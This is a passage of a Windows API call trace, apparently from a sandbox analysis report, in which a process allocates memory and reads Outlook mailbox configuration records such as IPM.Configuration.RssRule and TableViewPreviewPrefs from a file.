LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x44114f0 [0251.749] LocalFree (hMem=0x5d1eed0) returned 0x0 [0251.749] LocalFree (hMem=0x5d1f2c0) returned 0x0 [0251.749] LocalFree (hMem=0x5d1eae0) returned 0x0 [0251.749] LocalFree (hMem=0x5d1ee70) returned 0x0 [0251.749] LocalFree (hMem=0x5d1eba0) returned 0x0 [0251.749] LocalFree (hMem=0x5d1f3e0) returned 0x0 [0251.749] LocalFree (hMem=0x5d1f1d0) returned 0x0 [0251.749] LocalFree (hMem=0x5d1b1e0) returned 0x0 [0251.749] LocalFree (hMem=0xd1b3650) returned 0x0 [0251.749] LocalFree (hMem=0x4433dc0) returned 0x0 [0251.750] LocalFree (hMem=0x5d1f320) returned 0x0 [0251.750] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.750] LocalFree (hMem=0x5d1eb40) returned 0x0 [0251.750] LocalFree (hMem=0x5d1f140) returned 0x0 [0251.750] LocalFree (hMem=0x4433f10) returned 0x0 [0251.750] LocalFree (hMem=0x5d1f1a0) returned 0x0 [0251.750] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.750] LocalFree (hMem=0x5d1ef30) returned 0x0 [0251.750] LocalFree (hMem=0x5d1eb70) returned 0x0 [0251.750] LocalFree (hMem=0x5d1ea80) returned 0x0 [0251.750] LocalFree (hMem=0x5d1ec90) returned 0x0 [0251.750] LocalFree (hMem=0x5d1f110) returned 0x0 [0251.750] LocalFree (hMem=0x5d1ebd0) returned 0x0 [0251.750] LocalFree (hMem=0x5d1f380) returned 0x0 [0251.750] LocalFree (hMem=0x5d1eab0) returned 0x0 [0251.750] LocalFree (hMem=0x5d1f230) returned 0x0 [0251.750] LocalFree (hMem=0xd181810) returned 0x0 [0251.750] LocalFree (hMem=0x5d1f350) returned 0x0 [0251.750] bsearch (_Key=0x235e4c8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84c10 [0251.750] LocalAlloc (uFlags=0x40, uBytes=0x1c2) returned 0x5d3c5b0 [0251.750] SetFilePointer (in: hFile=0xb48, lDistanceToMove=76288, lpDistanceToMoveHigh=0x235e488*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e488*=0) returned 0x12a00 [0251.750] ReadFile (in: hFile=0xb48, lpBuffer=0x5d3c5b0, nNumberOfBytesToRead=0x1c2, lpNumberOfBytesRead=0x235e498, lpOverlapped=0x0 | out: lpBuffer=0x5d3c5b0*, lpNumberOfBytesRead=0x235e498*=0x1c2, lpOverlapped=0x0) returned 1 [0251.750] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411690 [0251.750] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1ede0 [0251.750] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0xd1d9280 [0251.750] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee40 [0251.750] LocalAlloc (uFlags=0x40, uBytes=0x33) returned 0x5d1b1e0 [0251.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPM.Configuration.RssRule", cchWideChar=52, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPM.Configuration.RssRule", lpUsedDefaultChar=0x0) returned 52 [0251.750] LocalFree (hMem=0x5d1b1e0) returned 0x0 [0251.750] LocalAlloc (uFlags=0x40, uBytes=0x34) returned 0x5d1b1e0 [0251.750] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eae0 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x33) returned 0x5d1b220 [0251.751] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPM.Configuration.RssRule", cchWideChar=52, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPM.Configuration.RssRule", lpUsedDefaultChar=0x0) returned 52 [0251.751] LocalFree (hMem=0x5d1b220) returned 0x0 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x34) returned 0x5d1b220 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f1a0 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433fa0 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f0b0 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f60 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ec30 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4411550 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f4a0 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x44118f0 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eab0 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4411770 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ed50 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f30 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f260 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e60 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f0e0 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0xc5) returned 0xd215f90 [0251.751] LocalFree (hMem=0x5d3c5b0) returned 0x0 [0251.751] LocalFree (hMem=0x4411690) returned 0x0 [0251.751] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d38f10 [0251.751] LocalFree (hMem=0x5d1b1e0) returned 0x0 [0251.751] LocalFree (hMem=0x5d1b220) returned 0x0 [0251.751] LocalFree (hMem=0x4433fa0) returned 0x0 [0251.751] LocalFree (hMem=0x4433f60) returned 0x0 [0251.751] LocalFree (hMem=0x4411550) returned 0x0 [0251.751] LocalFree (hMem=0x44118f0) returned 0x0 [0251.751] LocalFree (hMem=0x4411770) returned 0x0 [0251.752] LocalFree (hMem=0x4433f30) returned 0x0 [0251.752] LocalFree (hMem=0x4433e60) returned 0x0 [0251.752] LocalAlloc (uFlags=0x40, uBytes=0x48) returned 0xd1bdd90 [0251.752] LocalAlloc (uFlags=0x40, uBytes=0xc5) returned 0xd214800 [0251.752] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.752] LocalFree (hMem=0x5d1eae0) returned 0x0 [0251.752] LocalFree (hMem=0x5d1f1a0) returned 0x0 [0251.752] LocalFree (hMem=0x5d1f0b0) returned 0x0 [0251.752] LocalFree (hMem=0x5d1ec30) returned 0x0 [0251.752] LocalFree (hMem=0x5d1f4a0) returned 0x0 [0251.752] LocalFree (hMem=0x5d1eab0) returned 0x0 [0251.752] LocalFree (hMem=0x5d1ed50) returned 0x0 [0251.752] LocalFree (hMem=0x5d1f260) returned 0x0 [0251.752] LocalFree (hMem=0xd215f90) returned 0x0 [0251.752] LocalFree (hMem=0x5d1f0e0) returned 0x0 [0251.752] LocalFree (hMem=0xd1d9280) returned 0x0 [0251.752] LocalFree (hMem=0x5d1ede0) returned 0x0 [0251.752] LocalFree (hMem=0xd1bdd90) returned 0x0 [0251.752] LocalFree (hMem=0x5d38f10) returned 0x0 [0251.752] bsearch (_Key=0x235e4c8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84c38 [0251.752] LocalAlloc (uFlags=0x40, uBytes=0x232) returned 0x4363910 [0251.752] SetFilePointer (in: hFile=0xb48, lDistanceToMove=77312, lpDistanceToMoveHigh=0x235e488*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e488*=0) returned 0x12e00 [0251.752] ReadFile (in: hFile=0xb48, lpBuffer=0x4363910, nNumberOfBytesToRead=0x232, lpNumberOfBytesRead=0x235e498, lpOverlapped=0x0 | out: lpBuffer=0x4363910*, lpNumberOfBytesRead=0x235e498*=0x232, lpOverlapped=0x0) returned 1 [0251.752] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411770 [0251.752] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1f1d0 [0251.752] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0xd1d9520 [0251.752] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1edb0 [0251.752] LocalAlloc (uFlags=0x40, uBytes=0x47) returned 0xd1bdd40 [0251.752] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPM.Configuration.ConversationPrefs", cchWideChar=72, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPM.Configuration.ConversationPrefs", lpUsedDefaultChar=0x0) returned 72 [0251.752] LocalFree (hMem=0xd1bdd40) returned 0x0 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x48) returned 0xd1bdd40 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f3b0 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x47) returned 0xd1bd570 [0251.753] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPM.Configuration.ConversationPrefs", cchWideChar=72, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPM.Configuration.ConversationPrefs", lpUsedDefaultChar=0x0) returned 72 [0251.753] LocalFree (hMem=0xd1bd570) returned 0x0 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x48) returned 0xd1bdd90 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ef30 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434090 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ed50 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ea0 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f0b0 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4411550 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f140 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4411690 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee40 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x44117b0 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f230 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e30 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f440 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ec0 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f290 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0x10c) returned 0xd210440 [0251.753] LocalFree (hMem=0x4363910) returned 0x0 [0251.753] LocalFree (hMem=0x4411770) returned 0x0 [0251.753] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d3ac10 [0251.753] LocalFree (hMem=0xd1bdd40) returned 0x0 [0251.753] LocalFree (hMem=0xd1bdd90) returned 0x0 [0251.753] LocalFree (hMem=0x4434090) returned 0x0 [0251.754] LocalFree (hMem=0x4433ea0) returned 0x0 [0251.754] LocalFree (hMem=0x4411550) returned 0x0 [0251.754] LocalFree (hMem=0x4411690) returned 0x0 [0251.754] LocalFree (hMem=0x44117b0) returned 0x0 [0251.754] LocalFree (hMem=0x4433e30) returned 0x0 [0251.754] LocalFree (hMem=0x4433ec0) returned 0x0 [0251.754] LocalAlloc (uFlags=0x40, uBytes=0x48) returned 0xd1be240 [0251.754] LocalAlloc (uFlags=0x40, uBytes=0x10c) returned 0xd2108c0 [0251.754] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.754] LocalFree (hMem=0x5d1f3b0) returned 0x0 [0251.754] LocalFree (hMem=0x5d1ef30) returned 0x0 [0251.754] LocalFree (hMem=0x5d1ed50) returned 0x0 [0251.754] LocalFree (hMem=0x5d1f0b0) returned 0x0 [0251.754] LocalFree (hMem=0x5d1f140) returned 0x0 [0251.754] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.754] LocalFree (hMem=0x5d1f230) returned 0x0 [0251.754] LocalFree (hMem=0x5d1f440) returned 0x0 [0251.754] LocalFree (hMem=0xd210440) returned 0x0 [0251.754] LocalFree (hMem=0x5d1f290) returned 0x0 [0251.754] LocalFree (hMem=0xd1d9520) returned 0x0 [0251.754] LocalFree (hMem=0x5d1f1d0) returned 0x0 [0251.754] LocalFree (hMem=0xd1be240) returned 0x0 [0251.754] LocalFree (hMem=0x5d3ac10) returned 0x0 [0251.754] bsearch (_Key=0x235e4c8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84c60 [0251.754] LocalAlloc (uFlags=0x40, uBytes=0x1ca) returned 0xd1bbcd0 [0251.754] SetFilePointer (in: hFile=0xb48, lDistanceToMove=78848, lpDistanceToMoveHigh=0x235e488*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e488*=0) returned 0x13400 [0251.754] ReadFile (in: hFile=0xb48, lpBuffer=0xd1bbcd0, nNumberOfBytesToRead=0x1ca, lpNumberOfBytesRead=0x235e498, lpOverlapped=0x0 | out: lpBuffer=0xd1bbcd0*, lpNumberOfBytesRead=0x235e498*=0x1ca, lpOverlapped=0x0) returned 1 [0251.754] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411330 [0251.754] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1f4d0 [0251.754] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0xd1d8410 [0251.754] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eb40 [0251.754] LocalAlloc (uFlags=0x40, uBytes=0x33) returned 0x5d1b1e0 [0251.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPM.Configuration.TCPrefs", cchWideChar=52, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPM.Configuration.TCPrefs", lpUsedDefaultChar=0x0) returned 52 [0251.755] LocalFree (hMem=0x5d1b1e0) returned 0x0 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x34) returned 0x5d1b1e0 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ef30 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x33) returned 0x5d1b220 [0251.755] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPM.Configuration.TCPrefs", cchWideChar=52, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPM.Configuration.TCPrefs", lpUsedDefaultChar=0x0) returned 52 [0251.755] LocalFree (hMem=0x5d1b220) returned 0x0 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x34) returned 0x5d1b220 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f320 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ef0 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f3b0 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433fb0 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1edb0 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4411690 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f440 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4411550 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eed0 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x44118f0 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f080 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433fa0 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f140 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f10 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ea20 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0xcd) returned 0x40f6c0 [0251.755] LocalFree (hMem=0xd1bbcd0) returned 0x0 [0251.755] LocalFree (hMem=0x4411330) returned 0x0 [0251.755] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d37b10 [0251.756] LocalFree (hMem=0x5d1b1e0) returned 0x0 [0251.756] LocalFree (hMem=0x5d1b220) returned 0x0 [0251.756] LocalFree (hMem=0x4433ef0) returned 0x0 [0251.756] LocalFree (hMem=0x4433fb0) returned 0x0 [0251.756] LocalFree (hMem=0x4411690) returned 0x0 [0251.756] LocalFree (hMem=0x4411550) returned 0x0 [0251.756] LocalFree (hMem=0x44118f0) returned 0x0 [0251.756] LocalFree (hMem=0x4433fa0) returned 0x0 [0251.756] LocalFree (hMem=0x4433f10) returned 0x0 [0251.756] LocalAlloc (uFlags=0x40, uBytes=0x48) returned 0xd1bdd40 [0251.756] LocalAlloc (uFlags=0x40, uBytes=0xcd) returned 0x4103e0 [0251.756] LocalFree (hMem=0x5d1eb40) returned 0x0 [0251.756] LocalFree (hMem=0x5d1ef30) returned 0x0 [0251.756] LocalFree (hMem=0x5d1f320) returned 0x0 [0251.756] LocalFree (hMem=0x5d1f3b0) returned 0x0 [0251.756] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.756] LocalFree (hMem=0x5d1f440) returned 0x0 [0251.756] LocalFree (hMem=0x5d1eed0) returned 0x0 [0251.756] LocalFree (hMem=0x5d1f080) returned 0x0 [0251.756] LocalFree (hMem=0x5d1f140) returned 0x0 [0251.756] LocalFree (hMem=0x40f6c0) returned 0x0 [0251.756] LocalFree (hMem=0x5d1ea20) returned 0x0 [0251.756] LocalFree (hMem=0xd1d8410) returned 0x0 [0251.756] LocalFree (hMem=0x5d1f4d0) returned 0x0 [0251.756] LocalFree (hMem=0xd1bdd40) returned 0x0 [0251.756] LocalFree (hMem=0x5d37b10) returned 0x0 [0251.756] bsearch (_Key=0x235e4c8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84c88 [0251.756] LocalAlloc (uFlags=0x40, uBytes=0x252) returned 0x43a9090 [0251.756] SetFilePointer (in: hFile=0xb48, lDistanceToMove=80704, lpDistanceToMoveHigh=0x235e488*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e488*=0) returned 0x13b40 [0251.756] ReadFile (in: hFile=0xb48, lpBuffer=0x43a9090, nNumberOfBytesToRead=0x252, lpNumberOfBytesRead=0x235e498, lpOverlapped=0x0 | out: lpBuffer=0x43a9090*, lpNumberOfBytesRead=0x235e498*=0x252, lpOverlapped=0x0) returned 1 [0251.756] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x44118f0 [0251.756] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1ee40 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x140) returned 0xd1d9130 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1e960 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x4f) returned 0x4432e10 [0251.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPM.Configuration.TableViewPreviewPrefs", cchWideChar=80, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPM.Configuration.TableViewPreviewPrefs", lpUsedDefaultChar=0x0) returned 80 [0251.757] LocalFree (hMem=0x4432e10) returned 0x0 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x4432e10 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ed20 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x4f) returned 0x4432f30 [0251.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IPM.Configuration.TableViewPreviewPrefs", cchWideChar=80, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPM.Configuration.TableViewPreviewPrefs", lpUsedDefaultChar=0x0) returned 80 [0251.757] LocalFree (hMem=0x4432f30) returned 0x0 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x4432ab0 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f470 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ee0 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ea80 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434030 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ea50 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4411550 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ef30 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x4411690 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f2c0 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x4411770 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eea0 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ef0 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ebd0 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433dc0 [0251.757] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1edb0 [0251.758] LocalAlloc (uFlags=0x40, uBytes=0x11d) returned 0xd190340 [0251.758] LocalFree (hMem=0x43a9090) returned 0x0 [0251.758] LocalFree (hMem=0x44118f0) returned 0x0 [0251.758] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d3ac10 [0251.758] LocalFree (hMem=0x4432e10) returned 0x0 [0251.758] LocalFree (hMem=0x4432ab0) returned 0x0 [0251.758] LocalFree (hMem=0x4433ee0) returned 0x0 [0251.758] LocalFree (hMem=0x4434030) returned 0x0 [0251.758] LocalFree (hMem=0x4411550) returned 0x0 [0251.758] LocalFree (hMem=0x4411690) returned 0x0 [0251.758] LocalFree (hMem=0x4411770) returned 0x0 [0251.758] LocalFree (hMem=0x4433ef0) returned 0x0 [0251.758] LocalFree (hMem=0x4433dc0) returned 0x0 [0251.758] LocalAlloc (uFlags=0x40, uBytes=0x48) returned 0xd1bde80 [0251.758] LocalAlloc (uFlags=0x40, uBytes=0x11d) returned 0xd190df0 [0251.758] LocalFree (hMem=0x5d1e960) returned 0x0 [0251.758] LocalFree (hMem=0x5d1ed20) returned 0x0 [0251.758] LocalFree (hMem=0x5d1f470) returned 0x0 [0251.758] LocalFree (hMem=0x5d1ea80) returned 0x0 [0251.758] LocalFree (hMem=0x5d1ea50) returned 0x0 [0251.758] LocalFree (hMem=0x5d1ef30) returned 0x0 [0251.758] LocalFree (hMem=0x5d1f2c0) returned 0x0 [0251.758] LocalFree (hMem=0x5d1eea0) returned 0x0 [0251.758] LocalFree (hMem=0x5d1ebd0) returned 0x0 [0251.758] LocalFree (hMem=0xd190340) returned 0x0 [0251.808] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.808] LocalFree (hMem=0xd1d9130) returned 0x0 [0251.808] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.808] LocalFree (hMem=0xd1bde80) returned 0x0 [0251.808] LocalFree (hMem=0x5d3ac10) returned 0x0 [0251.808] LocalFree (hMem=0x44114f0) returned 0x0 [0251.808] LocalFree (hMem=0x5d38010) returned 0x0 [0251.808] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84580 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x70) returned 0xd20a830 [0251.809] SetFilePointer (in: hFile=0xb48, lDistanceToMove=23616, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x5c40 [0251.809] ReadFile (in: hFile=0xb48, lpBuffer=0xd20a830, nNumberOfBytesToRead=0x70, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0xd20a830*, lpNumberOfBytesRead=0x235e4c8*=0x70, lpOverlapped=0x0) returned 1 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd194180 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1f170 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0xa0) returned 0xd1d00d0 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f320 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0xd1941a0 [0251.809] LocalFree (hMem=0xd1941a0) returned 0x0 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0xd1941a0 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee40 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x5d1f140 [0251.809] LocalFree (hMem=0x5d1f140) returned 0x0 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1eea0 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eba0 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e60 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ea50 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433ee0 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1edb0 [0251.809] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e70 [0251.809] LocalFree (hMem=0xd20a830) returned 0x0 [0251.810] LocalFree (hMem=0xd194180) returned 0x0 [0251.810] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d3a410 [0251.810] LocalFree (hMem=0xd1941a0) returned 0x0 [0251.810] LocalFree (hMem=0x5d1eea0) returned 0x0 [0251.810] LocalFree (hMem=0x4433e60) returned 0x0 [0251.810] LocalFree (hMem=0x4433ee0) returned 0x0 [0251.810] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xd1942c0 [0251.810] LocalFree (hMem=0x5d1f320) returned 0x0 [0251.810] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.810] LocalFree (hMem=0x5d1eba0) returned 0x0 [0251.810] LocalFree (hMem=0x5d1ea50) returned 0x0 [0251.810] LocalFree (hMem=0x4433e70) returned 0x0 [0251.810] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.810] LocalFree (hMem=0xd1d00d0) returned 0x0 [0251.810] LocalFree (hMem=0x5d1f170) returned 0x0 [0251.810] LocalFree (hMem=0xd1942c0) returned 0x0 [0251.810] LocalFree (hMem=0x5d3a410) returned 0x0 [0251.810] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d845a8 [0251.810] LocalAlloc (uFlags=0x40, uBytes=0x80) returned 0x43df6a0 [0251.810] SetFilePointer (in: hFile=0xb48, lDistanceToMove=19200, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x4b00 [0251.810] ReadFile (in: hFile=0xb48, lpBuffer=0x43df6a0, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0x43df6a0*, lpNumberOfBytesRead=0x235e4c8*=0x80, lpOverlapped=0x0) returned 1 [0251.810] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0xd1948e0 [0251.810] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1f500 [0251.810] LocalAlloc (uFlags=0x40, uBytes=0xa0) returned 0xd1cf940 [0251.810] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f1a0 [0251.810] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0xd194740 [0251.810] LocalFree (hMem=0xd194740) returned 0x0 [0251.810] LocalAlloc (uFlags=0x40, uBytes=0x16) returned 0xd1941a0 [0251.810] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ed20 [0251.811] LocalAlloc (uFlags=0x40, uBytes=0x23) returned 0x5d1f290 [0251.811] LocalFree (hMem=0x5d1f290) returned 0x0 [0251.811] LocalAlloc (uFlags=0x40, uBytes=0x24) returned 0x5d1efc0 [0251.811] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee40 [0251.811] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f80 [0251.811] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 